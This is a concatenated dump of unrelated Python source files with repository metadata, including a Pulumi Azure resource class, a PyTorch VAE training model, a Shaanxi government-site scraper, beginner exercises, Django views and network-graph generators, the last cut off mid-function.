return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state, which only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="publishingProfile")
def publishing_profile(self) -> pulumi.Output['outputs.GalleryApplicationVersionPublishingProfileResponse']:
"""
The publishing profile of a gallery Image Version.
"""
return pulumi.get(self, "publishing_profile")
@property
@pulumi.getter(name="replicationStatus")
def replication_status(self) -> pulumi.Output['outputs.ReplicationStatusResponse']:
"""
This is the replication status of the gallery Image Version.
"""
return pulumi.get(self, "replication_status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
[
"[email protected]"
] | |
be18a828d415817294724c04ce3bef696dac9a91
|
d9af3a98a0864de7ebb0cfd1675a052779e46bf2
|
/transformer_split/vae_model.py
|
e94ea7dccaf8599afbe98b4b7e286dfb52f4a1af
|
[
"MIT"
] |
permissive
|
fredericgo/rl_morph_pytorch
|
eafc36128e60296743a42b25d417efe17128ac93
|
743cd82d82c16c8d52e5265b6cc5cdf490cb8945
|
refs/heads/main
| 2023-07-11T05:51:43.914695 | 2021-08-09T02:54:06 | 2021-08-09T02:54:06 | 344,523,334 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,741 |
py
|
import os
import torch
import torch.nn as nn
from torch.nn import functional as F
import torch.optim as optim
import numpy as np
from transformer_split.encoders import PoseEncoder
from transformer_split.decoder import Decoder
from transformer_split.discriminator import Discriminator
def kl_divergence(mu, logvar):
return - 0.5 * (1 + logvar - mu.pow(2) - logvar.exp()).mean()
def mse_loss(input, target):
return (input - target).pow(2).mean()
def frange_cycle_linear(start, stop, n_epoch, n_cycle=4, ratio=0.5):
L = np.ones(n_epoch)
period = n_epoch/n_cycle
step = (stop-start)/(period*ratio) # linear schedule
for c in range(n_cycle):
v , i = start , 0
while v <= stop and (int(i+c*period) < n_epoch):
L[int(i+c*period)] = v
v += step
i += 1
return L
class VAE_Model(nn.Module):
def __init__(self, args):
super(VAE_Model, self).__init__()
enc = PoseEncoder(
root_size=args.root_size,
feature_size=args.dim_per_limb,
latent_size=args.latent_dim,
batch_size=args.batch_size,
ninp=args.attention_embedding_size,
nhead=args.attention_heads,
nhid=args.attention_hidden_size,
nlayers=args.attention_layers,
max_num_limbs=args.max_num_limbs,
dropout=args.dropout_rate
)
decoder = Decoder(
root_size=args.root_size,
feature_size=args.dim_per_limb,
latent_size=args.latent_dim,
batch_size=args.batch_size,
ninp=args.attention_embedding_size,
nhead=args.attention_heads,
nhid=args.attention_hidden_size,
nlayers=args.attention_layers,
max_num_limbs=args.max_num_limbs,
dropout=args.dropout_rate
)
discriminator = Discriminator(
root_size=args.root_size,
feature_size=args.dim_per_limb,
max_num_limbs=args.max_num_limbs
)
self.add_module("enc", enc)
self.add_module("decoder", decoder)
self.add_module("discriminator", discriminator)
self.batch_size = args.batch_size
self.latent_dim = args.latent_dim
encoder_parameters = list(self.enc.parameters())
self.auto_encoder_optimizer = optim.Adam(
encoder_parameters + list(self.decoder.parameters()),
lr=args.ae_lr,
)
self.discriminator_optimizer = optim.Adam(
list(self.discriminator.parameters()),
lr=args.lr,
)
self.generator_optimizer = optim.Adam(
encoder_parameters + list(self.decoder.parameters()),
lr=args.lr,
)
self.beta = args.beta
self.device = torch.device("cuda" if args.cuda else "cpu")
self.root_size = args.root_size
self.discriminator_limiting_accuracy = args.discriminator_limiting_accuracy
self.gp_weight = args.gradient_penalty
self.beta_schedule = frange_cycle_linear(0, args.beta, args.epochs, 4, 1)
def _gradient_penalty(self, D, real_data, generated_data):
real_data = torch.cat(real_data, dim=-1)
generated_data = torch.cat(generated_data, dim=-1)
batch_size = real_data.size()[0]
d = int(real_data.size()[1] / 2)
# Calculate interpolation
alpha = torch.rand(batch_size, 1, device=real_data.device, requires_grad=True)
alpha = alpha.expand_as(real_data)
alpha = alpha.to(generated_data.device)
interpolated = alpha * real_data.data + (1 - alpha) * generated_data.data
interpolated = torch.split(interpolated, [d, d], dim=-1)
# Calculate probability of interpolated examples
prob_interpolated = D(*interpolated)
# Calculate gradients of probabilities with respect to examples
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=interpolated,
grad_outputs=torch.ones(prob_interpolated.size(),
device=real_data.device),
create_graph=True, retain_graph=True)[0]
# Gradients have shape (batch_size, num_channels, img_width, img_height),
# so flatten to easily take norm per example in batch
gradients = gradients.view(batch_size, -1)
# Derivatives of the gradient close to 0 can cause problems because of
# the square root, so manually calculate norm and add epsilon
gradients_norm = torch.sqrt(torch.sum(gradients ** 2, dim=1) + 1e-12)
# Return gradient penalty
return ((gradients_norm - 1) ** 2).mean()
def split_root_body(self, x):
x_root = x[:, :self.root_size]
x_body = x[:, self.root_size:]
return x_root, x_body
def transfer(self, x, structure):
x_root, x_body = self.split_root_body(x)
zp, zc, mean, logvar = self.enc(x_body)
xr = self.decoder(zp, zc, structure)
xr = torch.cat([x_root, xr], dim=-1)
return xr
def train_recon(self, x1, x2, structure, epoch):
self.auto_encoder_optimizer.zero_grad()
x1_root, x1_body = self.split_root_body(x1)
x2_root, x2_body = self.split_root_body(x2)
zp_1, zc_1, mean, logvar = self.enc(x1_body)
zp_2, zc_2, mean, logvar = self.enc(x2_body)
x1_r_body = self.decoder(zp_1, zc_2, structure)
x2_r_body = self.decoder(zp_2, zc_1, structure)
kl_loss = kl_divergence(mean, logvar).mean()
rec_loss1 = mse_loss(x1_r_body, x1_body)
rec_loss2 = mse_loss(x2_r_body, x2_body)
reconstruction_loss = rec_loss1 + rec_loss2
loss = reconstruction_loss + self.beta_schedule[epoch] * kl_loss
loss.backward()
torch.nn.utils.clip_grad_norm_(self.parameters(), 0.5)
self.auto_encoder_optimizer.step()
return rec_loss1, rec_loss1, kl_loss, self.beta_schedule[epoch], mean.mean(), logvar.mean()
def train_generator(self, x1, x3, structure3, epoch):
self.generator_optimizer.zero_grad()
x1_root, x1_body = self.split_root_body(x1)
x3_root, x3_body = self.split_root_body(x3)
# zc: class content
zp_1, zc, mean, logvar = self.enc(x1_body)
xr_13 = self.decoder(zp_1, zc, structure3)
kl_loss = kl_divergence(mean, logvar).mean()
# True labels
true_labels = torch.ones(self.batch_size,
dtype=torch.long,
device=x1.device)
d1 = self.discriminator(x3_body, xr_13)
gen_loss_1 = F.cross_entropy(d1, true_labels)
z_random = torch.normal(0, 1,
size=(self.batch_size, self.latent_dim),
device=x1.device)
xr_r3 = self.decoder(z_random, zc, structure3)
d2 = self.discriminator(x3_body, xr_r3)
gen_loss_2 = F.cross_entropy(d2, true_labels)
generator_loss = gen_loss_1 + gen_loss_2 + self.beta_schedule[epoch]* kl_loss
generator_loss.backward()
self.generator_optimizer.step()
return gen_loss_1, gen_loss_2, kl_loss
def train_discriminator(self, x1, x2, x3, structure3):
self.discriminator_optimizer.zero_grad()
x1_root, x1_body = self.split_root_body(x1)
x2_root, x2_body = self.split_root_body(x2)
x2_root, x3_body = self.split_root_body(x3)
true_labels = torch.ones(self.batch_size,
dtype=torch.long,
device=x1.device)
d_real = self.discriminator(x2_body, x3_body)
disc_loss_real = F.cross_entropy(d_real, true_labels)
fake_labels = torch.zeros(self.batch_size,
dtype=torch.long,
device=x1.device)
zp_1, zc, mean, logvar = self.enc(x1_body)
xr_13 = self.decoder(zp_1, zc, structure3)
d_fake = self.discriminator(x3_body, xr_13)
disc_loss_fake = F.cross_entropy(d_fake, fake_labels)
#gp = self.gp_weight * self._gradient_penalty(self.discriminator,
# (x2_body, x3_body),
# (x2_body, xr_13))
discriminator_loss = disc_loss_real + disc_loss_fake #+ gp
discriminator_loss.backward()
# calculate discriminator accuracy for this step
target_true_labels = torch.cat((true_labels, fake_labels), dim=0)
discriminator_predictions = torch.cat((d_real, d_fake), dim=0)
_, discriminator_predictions = torch.max(discriminator_predictions, 1)
discriminator_accuracy = (discriminator_predictions.data == target_true_labels.long()
).sum().item() / (self.batch_size * 2)
if discriminator_accuracy < self.discriminator_limiting_accuracy:
self.discriminator_optimizer.step()
return discriminator_loss, discriminator_accuracy
def save_model(self, path):
model_path = os.path.join(path, 'vae_model')
torch.save({
"encoder": self.enc.state_dict(),
"decoder": self.decoder.state_dict(),
"discriminator": self.discriminator.state_dict(),
}, model_path)
def load_model(self, path):
model_path = os.path.join(path, 'vae_model')
data = torch.load(model_path)
self.enc.load_state_dict(data['encoder'])
self.decoder.load_state_dict(data['decoder'])
self.discriminator.load_state_dict(data['discriminator'])
|
[
"[email protected]"
] | |
d15c621a094a3c2cf7b702955d0c138a4f2bb86c
|
0c599f1f7c79972515fc3eb9ba5fc76ccdaf511c
|
/exe06.py
|
9be15de64396c8e6a55785ab04b06928da90579a
|
[
"MIT"
] |
permissive
|
douglasdsantos/Exercicios_Python
|
3edca5cd88953d849047572f7761421e9797fec0
|
48019efaef4a5723719b1a4a602b8bee4a7d8ea3
|
refs/heads/master
| 2020-12-03T00:31:06.395893 | 2017-07-06T01:12:30 | 2017-07-06T01:12:30 | 96,038,250 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 266 |
py
|
# Faça um Programa que peça o raio de um círculo, calcule e mostre sua área.
pi = 3.14
raio_circulo = float(input('Digite o raio do circulo: '))
area_circulo = pi * (raio_circulo * raio_circulo)
print('A área do circulo é e {:.2f}m². '.format(area_circulo))
|
[
"[email protected]"
] | |
681af06de15223aa0c77bde8bd654abf013d3097
|
10ef0d072799dfd8ad5cf00b43755eeef2235692
|
/Harmonic.py
|
b872a07867153b8faa736d1780c23b34f6aa5c1e
|
[] |
no_license
|
naveenkommineni/Week3
|
a197dc2b9ed50ad544a32e0844bf3fe7fd9e0e84
|
484cd630322b820ef793986366f004ab88da5b81
|
refs/heads/master
| 2022-04-22T14:39:22.722987 | 2020-04-20T10:45:05 | 2020-04-20T10:45:05 | 256,490,686 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 113 |
py
|
n=int(input('Enter number:'))
sum=1
for i in range(2,n+1):
sum+=1/i
print("nth harmonic number is",sum)
|
[
"[email protected]"
] | |
18dca8071c100f0cf88bc13f0f558c9f7ca0a546
|
bac4d78b7dcdc46a28d14241454e7ac1caa68cfd
|
/worker/Shan3XiCrawler.py
|
8189d5790c331d41df3a30c22c9db737249400de
|
[
"MIT"
] |
permissive
|
xfrzrcj/SCCrawler
|
2dc230f807e9e1c1a6f9a6f399c8925e0c5c93e0
|
cbb6163f73f6a47eccffec481ff2fdf869ba5eb2
|
refs/heads/master
| 2020-03-19T13:06:21.149501 | 2018-06-08T03:29:13 | 2018-06-08T03:29:13 | 136,561,091 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,168 |
py
|
from worker import Crawler
import pymysql
import re
baseUrl = "http://www.qinfeng.gov.cn/"
sggbZjscIndexUrl = baseUrl + "scdc/sggb/zjsc.htm"
sggbDjcfIndexUrl = "http://www.qinfeng.gov.cn/scdc/sggb/djzwcf.htm"
qtgbZjscIndexUrl = baseUrl + "scdc/qtgb/zjsc.htm"
sqtgbDjcfIndexUrl = "http://www.qinfeng.gov.cn/scdc/qtgb/djzwcf.htm"
class SXSggbZjscCrawler(Crawler.CrawlerInterface):
def get_num(self):
soup = self.get_soup(sggbZjscIndexUrl)
a = soup.find("td", id="fanye1948")
num = a.text
num = re.findall("[0-9]+/[0-9]*", num)
num = num[0].split("/")[1]
return int(num)
def get_index(self):
return sggbZjscIndexUrl
def join_url(self, i):
url = baseUrl+"scdc/sggb/zjsc/"+str(i)+".htm"
return url
def get_urls(self, url):
soup = self.get_soup(url)
lists = soup.find("ul", class_="xsxc_index_center_list")
tags = lists.find_all("a")
urls = []
for tag in tags:
info_url = baseUrl + tag.get('href').replace("../", "")
urls.append(info_url)
return urls
def get_info(self, url):
info_result = Crawler.Info()
info_result.url = url
soup = self.get_soup(url)
title = soup.find("div", class_="article_title")
info_result.title = title.text
info_result.time = soup.find("div", class_="article_date").text
article = soup.find("div", class_="v_news_content")
ps = article.find_all("p")
text = ""
for p in ps:
text = text + p.text.replace("\t", "") + "\n"
self.get_resum_description_from_text(text, info_result)
return info_result
def process_info(self, info):
info.province = "陕西"
info.source = info.source.replace("来源:", "")
info.time = info.time.replace("发布时间:", "")
info.postion = "省管干部,执纪审查"
return info
class SXSggbDjcfCrawler(Crawler.CrawlerInterface):
def get_num(self):
soup = self.get_soup(sggbDjcfIndexUrl)
a = soup.find("td", id="fanye1948")
num = a.text
num = re.findall("[0-9]+/[0-9]*", num)
num = num[0].split("/")[1]
return int(num)
def get_index(self):
return sggbDjcfIndexUrl
def join_url(self, i):
url = baseUrl+"scdc/sggb/djzwcf/"+str(i)+".htm"
return url
def get_urls(self, url):
soup = self.get_soup(url)
lists = soup.find("ul", class_="xsxc_index_center_list")
tags = lists.find_all("a")
urls = []
for tag in tags:
info_url = baseUrl + tag.get('href').replace("../", "")
urls.append(info_url)
return urls
def get_info(self, url):
info_result = Crawler.Info()
info_result.url = url
soup = self.get_soup(url)
title = soup.find("div", class_="article_title")
info_result.title = title.text
info_result.time = soup.find("div", class_="article_date").text
article = soup.find("div", class_="v_news_content")
ps = article.find_all("p")
text = ""
for p in ps:
text = text + p.text.replace("\t", "") + "\n"
self.get_resum_description_from_text(text, info_result)
return info_result
def process_info(self, info):
info.province = "陕西"
info.source = info.source.replace("来源:", "")
info.time = info.time.replace("发布时间:", "")
info.postion = "省管干部,党纪政务处分"
return info
class SXQtgbDjcfCrawler(Crawler.CrawlerInterface):
def get_num(self):
soup = self.get_soup(sqtgbDjcfIndexUrl)
a = soup.find("td", id="fanye1948")
num = a.text
num = re.findall("[0-9]+/[0-9]*", num)
num = num[0].split("/")[1]
return int(num)
def get_index(self):
return sqtgbDjcfIndexUrl
def join_url(self, i):
url = baseUrl+"scdc/qtgb/djzwcf/"+str(i)+".htm"
return url
def get_urls(self, url):
soup = self.get_soup(url)
lists = soup.find("ul", class_="xsxc_index_center_list")
tags = lists.find_all("a")
urls = []
for tag in tags:
info_url = baseUrl + tag.get('href').replace("../", "")
urls.append(info_url)
return urls
def get_info(self, url):
info_result = Crawler.Info()
info_result.url = url
soup = self.get_soup(url)
title = soup.find("div", class_="article_title")
info_result.title = title.text
info_result.time = soup.find("div", class_="article_date").text
article = soup.find("div", class_="v_news_content")
ps = article.find_all("p")
text = ""
for p in ps:
text = text + p.text.replace("\t", "") + "\n"
self.get_resum_description_from_text(text, info_result)
return info_result
def process_info(self, info):
info.province = "陕西"
info.source = info.source.replace("来源:", "")
info.time = info.time.replace("发布时间:", "")
info.postion = "其他干部,党纪政务处分"
return info
class SXQtgbZjscCrawler(Crawler.CrawlerInterface):
def get_num(self):
soup = self.get_soup(qtgbZjscIndexUrl)
a = soup.find("td", id="fanye1948")
num = a.text
num = re.findall("[0-9]+/[0-9]*", num)
num = num[0].split("/")[1]
return int(num)
def get_index(self):
return qtgbZjscIndexUrl
def join_url(self, i):
url = baseUrl+"scdc/qtgb/zjsc/"+str(i)+".htm"
return url
def get_urls(self, url):
soup = self.get_soup(url)
lists = soup.find("ul", class_="xsxc_index_center_list")
tags = lists.find_all("a")
urls = []
for tag in tags:
info_url = baseUrl + tag.get('href').replace("../", "")
urls.append(info_url)
return urls
def get_info(self, url):
info_result = Crawler.Info()
info_result.url = url
soup = self.get_soup(url)
title = soup.find("div", class_="article_title")
info_result.title = title.text
info_result.time = soup.find("div", class_="article_date").text
article = soup.find("div", class_="v_news_content")
ps = article.find_all("p")
text = ""
for p in ps:
text = text + p.text.replace("\t", "") + "\n"
self.get_resum_description_from_text(text, info_result)
return info_result
def process_info(self, info):
info.province = "陕西"
info.source = info.source.replace("来源:", "")
info.time = info.time.replace("发布时间:", "")
info.postion = "其他干部,执纪审查"
return info
c = SXQtgbZjscCrawler()
conns = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='123456', db='data', charset='utf8')
c.start(conns)
conns.close()
# print(c.get_num())
# print(c.get_urls("http://www.qinfeng.gov.cn/scdc/sggb/zjsc.htm"))
# c.get_info("http://www.qinfeng.gov.cn/info/1896/76730.htm")
|
[
"[email protected]"
] | |
b5346db185ed928a79136d01fd3e7a44a8ff0b6e
|
b22588340d7925b614a735bbbde1b351ad657ffc
|
/athena/PackDist/share/python/PackDistCommon.py
|
0833847cfd1065059cea672b676003e232021674
|
[] |
no_license
|
rushioda/PIXELVALID_athena
|
90befe12042c1249cbb3655dde1428bb9b9a42ce
|
22df23187ef85e9c3120122c8375ea0e7d8ea440
|
refs/heads/master
| 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,754 |
py
|
"""File: PackDistCommon.py
Common classes and utility functions of the PackDist package.
"""
__author__ = 'Grigori Rybkine <[email protected]>'
__version__ = '0.2.1'
__date__ = 'Wed Oct 03 2012'
__all__ = ['Error', 'InputError', 'CommandError', 'exitstatus']
import sys
import os
class Error(Exception):
"""Base class for exceptions in this module."""
def __str__(self):
return ': '.join([str(arg) for arg in self.args])
def write(self, file = sys.stderr):
print >> file, '%s: %s' % (self.__class__.__name__, self)
class InputError(Error):
"""Exception raised for errors in the input.
Attributes:
expression() -- input expression in which the error occurred
message() -- explanation of the error
"""
def __init__(self, expression, message):
Error.__init__(self, expression, message)
def expression(self):
return self.args[0]
def message(self):
return self.args[1]
class CommandError(Error):
"""Exception raised for errors executing shell commands.
Attributes:
args[0] -- shell command executing which the error occurred
args[1] -- stderr and stdout of the command
args[2] -- exit status of the command
"""
def __init__(self, cmd, output, sc = None):
Error.__init__(self, cmd, output, sc)
def exitstatus (status):
"""Return child exit status, if child terminated normally, None otherwise.
Parameter status: child process status information as returned by os.wait(),
or os.waitpid(),
os.system(), close() method of file object returned by os.popen(),
commands.getstatusoutput()
"""
if os.WIFEXITED(status):
return os.WEXITSTATUS(status)
else:
return None
|
[
"[email protected]"
] | |
8c07ff1f2000187859283c0c13239c2b31bec23c
|
abd668ceb1736c029f3527561bea9995876025a0
|
/run.py
|
206c205905007d3d9d887ebc731993f08316348e
|
[] |
no_license
|
choltz95/simulated_annealing_pcb
|
7eb2554893b64bd57323ec95d1b583ff663dae31
|
da5b81b2d591b70f2051419d7f7b5b353feb4847
|
refs/heads/master
| 2020-04-23T22:13:27.608394 | 2019-04-15T18:25:44 | 2019-04-15T18:25:44 | 171,494,586 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 63 |
py
|
import pyximport; pyximport.install(pyimport=True)
import main
|
[
"[email protected]"
] | |
6f76c3e90edcaf9c1f2baf7fdfa020386a48cffd
|
828e48fdf39d9703ad40adf4b6830f6ccabafc46
|
/primarykeyid.py
|
0f8be37f05e39e0af96ff40e6037285fa4b43b0e
|
[] |
no_license
|
NitinKumarGehlot/Python-SQLite3
|
78f0b3010fff0ee049bb47ea74babd3ec51742f0
|
6cf0fa7162a31686e05de5c1cf89128412036302
|
refs/heads/master
| 2023-06-03T15:19:21.830210 | 2021-06-19T21:17:06 | 2021-06-19T21:17:06 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 340 |
py
|
import sqlite3
# conn=sqlite3.connect(":memory:")
conn=sqlite3.connect("customer.db")
#create cursor
c=conn.cursor()
#query the database
c.execute("SELECT rowid, * FROM customers")
# print(c.fetchone())
# c.fetchmany(3)
items=c.fetchall()
for i in items:
print(i)
#commit our command
conn.commit()
#close connection
conn.close()
|
[
"[email protected]"
] | |
81ea1ab2df818a7bab3de630e81d3f329599e6bf
|
e9b06426f553b7c1d3550a0932e60756e82c3f78
|
/Lab0/python_basics/shop.py
|
d48f8f01de1cadc4d63ee5f056e0d058d85567bf
|
[
"MIT"
] |
permissive
|
MaAlonsoA/AI-Class
|
a5af9b2e1a2dd76f377e04f4f2f0a784802f12a8
|
7fa679b69b699e86dfc99548620c62a37f3d8e57
|
refs/heads/master
| 2023-04-14T22:54:52.130742 | 2021-04-24T17:23:52 | 2021-04-24T17:23:52 | 346,392,810 | 0 | 0 |
MIT
| 2021-04-24T17:23:53 | 2021-03-10T14:59:31 |
Python
|
UTF-8
|
Python
| false | false | 1,328 |
py
|
class FruitShop:
def __init__(self, name, fruitPrices):
"""
name: Name of the fruit shop
fruitPrices: Dictionary with keys as fruit
strings and prices for values e.g.
{'apples':2.00, 'oranges': 1.50, 'pears': 1.75}
"""
self.fruitPrices = fruitPrices
self.name = name
print('Welcome to %s fruit shop' % (name))
def getCostPerPound(self, fruit):
"""
fruit: Fruit string
Returns cost of 'fruit', assuming 'fruit'
is in our inventory or None otherwise
"""
if fruit not in self.fruitPrices:
print("Sorry we don't have %s" % (fruit))
return None
return self.fruitPrices[fruit]
def getPriceOfOrder(self, orderList):
"""
orderList: List of (fruit, numPounds) tuples
Returns cost of orderList. If any of the fruit are
"""
totalCost = 0.0
for fruit, numPounds in orderList:
costPerPound = self.getCostPerPound(fruit)
if costPerPound != None:
totalCost += numPounds * costPerPound
return totalCost
def getName(self):
return self.name
def __str__(self):
return "<FruitShop: %s>" % self.getName()
|
[
"[email protected]"
] | |
b9b570d9546dee4ed6c0aab0c564c821e5c618b8
|
82bd360b0f58171b003957f3e2584bb51817d766
|
/lab03/lab03.py
|
e1b9c9e701af2c8371b9e1c7300021cdacf1be4f
|
[] |
no_license
|
kenwan006/cs61a
|
2ff00ec0a42f9478f60fe98b70af1b5ae2b8a66b
|
75aab1f348244d41cfb75a9ec1ebb24f81057a05
|
refs/heads/master
| 2020-06-27T16:30:09.573537 | 2019-09-14T23:16:57 | 2019-09-14T23:16:57 | 199,213,384 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,070 |
py
|
def ab_plus_c(a, b, c):
"""Computes a * b + c.
>>> ab_plus_c(2, 4, 3) # 2 * 4 + 3
11
>>> ab_plus_c(0, 3, 2) # 0 * 3 + 2
2
>>> ab_plus_c(3, 0, 2) # 3 * 0 + 2
2
"""
"*** YOUR CODE HERE ***"
if b == 0:
return c
return ab_plus_c(a, b-1, c) + a
def gcd(a, b):
"""Returns the greatest common divisor of a and b.
Should be implemented using recursion.
>>> gcd(34, 19)
1
>>> gcd(39, 91)
13
>>> gcd(20, 30)
10
>>> gcd(40, 40)
40
"""
"*** YOUR CODE HERE ***"
if a < b:
a, b = b, a
if a % b == 0:
return b
return gcd(b, a % b)
def hailstone(n):
"""Print out the hailstone sequence starting at n, and return the
number of elements in the sequence.
>>> a = hailstone(10)
10
5
16
8
4
2
1
>>> a
7
"""
"*** YOUR CODE HERE ***"
print(n)
if n == 1:
return 1
elif n % 2 == 0:
return hailstone(n // 2) + 1
else:
return hailstone(3 * n + 1) + 1
|
[
"[email protected]"
] | |
8fd82a02b96ef6922c7ccd498e793df6876f3f49
|
46c2418ecfcf3c7034a267364185208a665be583
|
/edb/tools/docs/cli.py
|
2c9295564c14536c42a30b9de2055cc410bdcb02
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
jankeromnes/edgedb
|
3434549fb0731632ed7adb7fcb329480dee50d91
|
40ea3317fe5bfec76d7b46f7b706a4cb8a0d9f94
|
refs/heads/master
| 2022-02-24T04:56:19.238048 | 2019-05-10T12:24:40 | 2019-06-17T10:29:09 | 185,984,093 | 0 | 0 |
Apache-2.0
| 2022-01-28T09:00:32 | 2019-05-10T12:24:55 |
Python
|
UTF-8
|
Python
| false | false | 1,466 |
py
|
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2018-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from edb.edgeql.pygments import EdgeQLLexer
from sphinx import domains as s_domains
from sphinx.directives import code as s_code
from . import shared
class CLISynopsisDirective(s_code.CodeBlock):
has_content = True
optional_arguments = 0
required_arguments = 0
option_spec = {}
def run(self):
self.arguments = ['cli-synopsis']
return super().run()
class CLIDomain(s_domains.Domain):
name = "cli"
label = "Command Line Interface"
directives = {
'synopsis': CLISynopsisDirective,
}
def setup_domain(app):
app.add_lexer("cli", EdgeQLLexer())
app.add_lexer("cli-synopsis", EdgeQLLexer())
app.add_role(
'cli:synopsis',
shared.InlineCodeRole('cli-synopsis'))
app.add_domain(CLIDomain)
|
[
"[email protected]"
] | |
43a228606e02826830759f5f40418f92e634af34
|
19892b65355f7661cf5e42d2f749904788c1a7d0
|
/dailyfresh/daily_fresh/utils/mixin.py
|
6174e5aba8081e3b2cf0368084ea7f0853225db5
|
[] |
no_license
|
BinXiaoEr/daily_fresh
|
35902cb6753851a14517265db3738a008610c7d8
|
d8bdc10e80b6b8e2be5f85f6a8293fb1f4695e1d
|
refs/heads/master
| 2021-07-09T16:06:34.809134 | 2020-08-04T01:51:34 | 2020-08-04T01:51:34 | 181,276,905 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 287 |
py
|
from django.contrib.auth.decorators import login_required
class LoginRequiredMixin(object):
@classmethod
def as_view(cls, **initkwargs):
# 调用父类的as_view
view = super(LoginRequiredMixin, cls).as_view(**initkwargs)
return login_required(view)
|
[
"[email protected]"
] | |
7321ac8c981ab9abb728e9c05fe1a2576ef0d878
|
3c327aa333bbeafacb8d5bd253814776ffcd0012
|
/df_user/urls.py
|
bf6fcb54488289e42e7484712a3e096f56b612be
|
[] |
no_license
|
1635848644/shopping
|
c5d0a1dd2eb5716ece76045d6c2c261ca0f4db18
|
d820e828eeed3911ea7741e4f11f4c6d83e993c6
|
refs/heads/master
| 2023-04-07T20:12:30.382805 | 2018-10-05T15:08:40 | 2018-10-05T15:08:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 405 |
py
|
#coding=utf-8
from django.conf.urls import url
from df_user import views
urlpatterns=[
url('register/',views.register),
url('login/',views.login),
url('logout/',views.logout),
url('addHarvsetAddress/',views.addHarvsetAddress),
url('user_center_info/',views.user_center_info),
url('user_center_order/',views.user_center_order),
url('user_center_site/',views.user_center_site),
]
|
[
"[email protected]"
] | |
f06180583df93797fbb6c3808e675c48fa3eb210
|
d4c9847a52d9107d64c61c52f990858177136d9f
|
/assignment-6/network.py
|
2761fc023baf5a17d4bf7fb9165d8958c0c4c375
|
[] |
no_license
|
MirunaSeme/Simulation-Methods
|
bc3fa0390a7e9197d31a11116f73358c624b4b28
|
c683472b15dfec30d2752a417926cae4a105649c
|
refs/heads/master
| 2021-09-04T19:13:59.923713 | 2018-01-21T15:43:24 | 2018-01-21T15:43:24 | 112,596,937 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,422 |
py
|
import numpy as np
from numpy.random import random
class Network:
"""
Abstract a network graph.
"""
@staticmethod
def AlbertBarabasi(n, directed=False, initial_graph=None):
if initial_graph is None:
# The bootstrap graph should have a minimum of 2 connected nodes
g = Network.FullyConnected(2, directed, allow_diagonals=False)
first_node_ix = 2
else:
g = initial_graph
n = n - g._n
first_node_ix = g._n
if n <= 0:
return g
"""
Starting from some initial graph, we add nodes that will connect to any other node with probability
proportional to the indegree (or degree) of that node. Thus, diagonal-friendliness does not makes sense in
this scenario. We also don't really care about whether the graph is directed or not since the underlying
graph data structure will take care of this.
"""
# The main node generator loop
for node_ix in range(first_node_ix, n):
# Gather indegrees and normalize them into the target node probability.
indegrees = g.indegrees()
target_probabilities = indegrees / np.sum(indegrees)
# Sample n-1 random numbers and decide whether to add a link to those nodes or not.
r = np.random.random(target_probabilities.shape)
edge_decision = r < target_probabilities
# Add the node and the edges.
g.add_node()
for target, add_flag in enumerate(edge_decision):
if add_flag:
g.add_edge(node_ix, target)
return g
@staticmethod
def WattsStrogatz(n, k, beta, directed=False):
def rewire(adj, i, j):
possible_links = [ix for ix in np.where(adj[i] == 0) if ix != i]
link = np.random.choice(possible_links, size=1)
adj[i,j] = adj[j,i] = 0
adj[i,link] = adj[link,i] = 1
g = Network.WSRingLattice(n, k)
adj = g._adj.copy()
rewire_queue = []
for i in range(n):
for j in range(i + 1, n):
if adj[i, j] == 1:
# Extract random number
if np.random.binomial(1, beta):
rewire_queue.append((i, j))
# Apply rewiring
for i, j in rewire_queue:
rewire(adj, i, j)
@staticmethod
def ErdosRenyi(n, p, directed=False, allow_diagonals=False):
"""
Creates a random graph.
"""
"""
Random edge generation:
Idea: generate an adjecency mtx with random values between 0 and 1.
All those over p will be added. We then filter the matrix based on whether options such as directed,
diagonal-friendly, etc were selected.
To have a fair sample in the undirected case, we just mirror the upper triangle of the matrix w.r.t main diagonal
"""
adj = np.random.random(size=(n, n))
# Adjust for diagonal-friendliness by element-wise multiplying by (1 - identity mtx).
# This is just swapping the 0s and 1s in the identity matrix (i.e. creating a 0-diagonal mtx).
if not allow_diagonals:
adj = adj * (1 - np.eye(n))
# Adjust for directedness by mirroring the upper triangle of the matrix.
# np.tril(n, -1) will generate indexes for the upper triangle. We then just copy the lower triangle of
# the transpose to our original mtx.
if not directed:
